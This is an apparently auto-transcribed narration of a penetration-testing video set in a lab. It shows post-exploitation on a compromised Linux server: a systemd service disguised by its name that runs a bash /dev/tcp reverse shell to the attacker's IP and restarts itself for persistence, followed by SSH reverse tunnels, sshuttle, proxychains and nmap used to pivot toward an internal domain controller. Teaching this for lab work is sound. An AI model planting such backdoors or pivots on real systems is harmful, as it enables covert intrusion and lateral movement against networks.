Welcome back guys again in this video. This is a continuation of the previous session where we successfully root this web server that is sitting behind this pfSense firewall plus Suricata with Suricata enabled as an intrusion prevention system. We will not be doing that effort again on trying to root it from outside, because that's a lot of effort. We keep changing our IP address when we get blocked by the IPS, and to imitate that session, I've just created a reverse shell access from the root. So basically, this is the commands that I run here from the system. This is actually a direct VNC on the machine, and just run a reverse shell because I want to show you running the steps here on the reverse shell. So in this video, the topic is going to be creating a persistence backdoor and also enabling pivot from our attacker machine to this Linux web server for us to be able to enumerate the internal networks. In this case, we are after the domain controller, which is running on 192.168.45.5, but that's going to be for another video. So okay, without further ado, let's go to our CLI. So again, first is to create a persistence backdoor. So there's a lot of way to do that. There's steps from a Metasploit module, but in this case, we will just create a system services that's going to be executed by the root during restart, and for every 3 seconds if in case the system is on failed status. So just go to system D, and here these are the services that's running on boot. We can create our own service here. You can name it whatever you want. Try to make it like a legitimate service, but in our case, we are just going to name it not backdoor, that service. So let's create our service here. So this is just how you create a service inside a Linux machine. It's not a service, and this is not a service. This is not a backdoor, and the actual service itself is type is going to be simple. Exec start equals, this is going to be the exact commands that's going to be running by the root. So in this case, I'm just gonna use a basic reverse shell. You can use whatever you want for your lab environment, but you see this is going to be very obvious. That's going to be run behind PSAUX. I'm gonna show you it later. CP, make sure that IP is 8.223, just to make sure our IP is 8.223 /9001 and 1. So making things correct. Bin splash /i dev tcp and 233 seems correct. Going to enable restart always. So this command will try to run again this service if in case the status is failed. So I'm using 3 seconds only for the sake of discussion, and install. Wanted by that equals multi-user.target. So just making sure everything is correct. Okay, save. Just gonna change its permission to executable by any, not backdoor.service, and for that we can actually start our listener here, 9001, and systemctl. We're going to tell that our configuration is change and system ctl enable. This will actually enable the service and start it. So let's just try to start it. We're not getting back. So why is that? Did you type the correct IP? 8.223. No, not backdoor.service. This is not a backdoor. So it's bin bash dash c. What? Let's see. I'm just gonna close this one because should be dev tcp /192.168.8.233 everything says. Let's just change the port here. Let's create a 4444 bin bash /bin/bash -c bash-i bash-dev tcp. Let's try it again, and nc-4444 warning. Let's just enable it and reload again. Okay, why is not system demo to reload units? Okay, now it's going to be a little bit of troubleshooting here. Just gonna close this one again. It's exec start, that's right. Bash-i and dev tcp, our IP address. You know what, let's just make sure that this is actually running. And see, no route to host. That's weird. .168.8.233. Okay, it's not reachable. I've config ping. We should. Okay, this is weird. I'm just gonna check if it gets blocked on the. It should not. Admin. I'm just gonna check if it's blocked on our service here. So it should not be because our shell is still running. Yeah, it's not. That's weird. /etc no config. Wait, our IP address is 8.233. Now if we ping it, what? Let's see. Wait a second. 192.168.223. Oh my god, that's a very unprofessional mistake. Anyway, so right now that we have it, let's just daemon reload. Oh yeah, we got the shell now here. I've config. So if we actually kill the shell and then just start this one, we're gonna get back our shell. So another thing to test it is just reload the machine -r. So now I'm gonna exit this one. So this is gonna die, and just gonna show you also here from this side. it's restarting. Okay, now we have 2 sessions here. I'm gonna close the other one. So just gonna close the other one here. So yep, you see on the background it's already connected here. So we successfully created a persistence backdoor. So whenever the machine is rebooted or we successfully kill our shell, we can just enable it again and we will get back our shell to the box. So now we successfully enabled persistence backdoor. The next step is to establish our pivot. So to do that, we need to enable our SSH because we're going. So if we go back here, listen, we'll see that the SSH is currently enabled on the box. However, it's only listening on the local machine. So some of you might say that we can just etc sshd score config dot config, is it right? No, cd/etc cd/ssh ssh. This is one. Got some of you might say that we can just change the 127.0.0.1 to listen to any ports. Man, come on. Cut sshd underscore config grep listen, I think it's listen address. Let's try listen. So yeah, we can change this to any 0.0.0.1 but 0.0.0.0, but remember the machine is sitting behind the firewall. So if we do that, we should also create a port forward in the firewall which we do not have access. So in order to create that, we will be doing a SSH local service remote service for forwarding. So do this. So right now I've already enabled SSH on my machine, so we can just run the commands here. Just make sure I'm gonna use port 2222. So right now there is nothing. So sh-r 2222 and are going to port forward this service running on port 22, which is SSH in this case, root at 192.168.8.223. Make sure that's correct. But before we do that, we actually need a stable shell here. pty.spawn bash export term equals xterm, and run that command again, because if I should have just showed you what's gonna happen if we don't have an interactive shell, but it's not gonna work because we need to input yes, or we need to get an interactive shell. So ssh.r. So right now we have an interactive shell, ssh-r root at 192.168.8.223, and yep, I've already added the host key file here. Already done this before. So just type the password, and if you run this one, you see our service now is running on our machine is now listening on our local host at port 2222. So if we try to connect to this, it's redirected to this tunnel that we have created here. So now the next thing to do is set up the pivot. So I'm just gonna show you the idea here. So yeah, basically we are just connected here, but since we gain access to this machine, we are actually creating a direct connection, direct tunnel here that is encrypted, and for that tunnel, it's going to be accessing these internal networks for us to enumerate this subnet. So just gonna show you that I'm using One is I'm using sshuttle here. So this is the command here. You just basically first run the local sudo password 123. What's the password here? Local sudo. Oh wait, should be my password, not the password, and the password on the machine. So right now we've created a tunnel, but this tunnel is not enough because I'm having problem running nmap on this. So basically we need also to enable this SSH dynamic port forwarding here, and it's basically the same, but this one is going to run the service. We're going to use proxy chains here. So if we just run it and password 123. So right now we have here this vbots shell, and I'm just gonna show you the proxy chains here. I'm sudo sublime proxy chains. What's that again? Sudo, if I can type correctly. Okay, so this is going to be the command here, sox5 127, localhost on port 9090, meaning anything when you run proxy chains on a command, it's going to be redirected to the proxy here, and then the machine will tell that it needs to be forwarded onto this 127.0.0.0.1 on port 222, which is this port forwarded that we enable here. Kind of confusing, but yeah, I hope you understand it. Anyway, so I'm just gonna open a new shell, just make sure. I think I already created it here. I already copied the scan sh. So just gonna nano cut scan.sh. So basically you need also to find what is the subnet that's running on the internal networks. So right now we don't have idea yet. So but if we come back here, we are 45.11. We can ping the gateway 8.45.1. So see, yes, where are we right now? So we can just create a script here, nano scan.sh, and run it. X scan.sh scan.sh until 168.45 dot thing. So this is going to ping all the subnets here. So from here we can see that these are the hosts that are alive. This is us, and this is the gateway, and also this could be something, right? So we can stop this now, and from here we can also just run nmap here, but I'm just going to do that. You need to enable proxy chains to make one thing to check if it's a domain controller, if it's listening on port 88, also in port 445. These are just the common ports that's just usually open on a domain controller. So right now if I run it, I think you can see here stuffs as of not as of yet, but I'm just gonna cut this video because this might take too long before it finish. So yeah, going back on the first, I actually rerun it. So we see that port 88 is open and it's saying that the service is Kerberos, and we also identify the version with Microsoft Windows, and also the time here, and below is the result for the port 445. You also see the clock's queue. What's important here is this one. It's a Windows Server 2016 standard 6.3. We get the net BIOS name, we got the domain name, the forest name, fully qualified domain name. Now we can just start enumerating and hopefully we can successfully gain access to the main controller, but that's going to be for another video. So yeah, that's it for this video, and thank you. Have a nice day.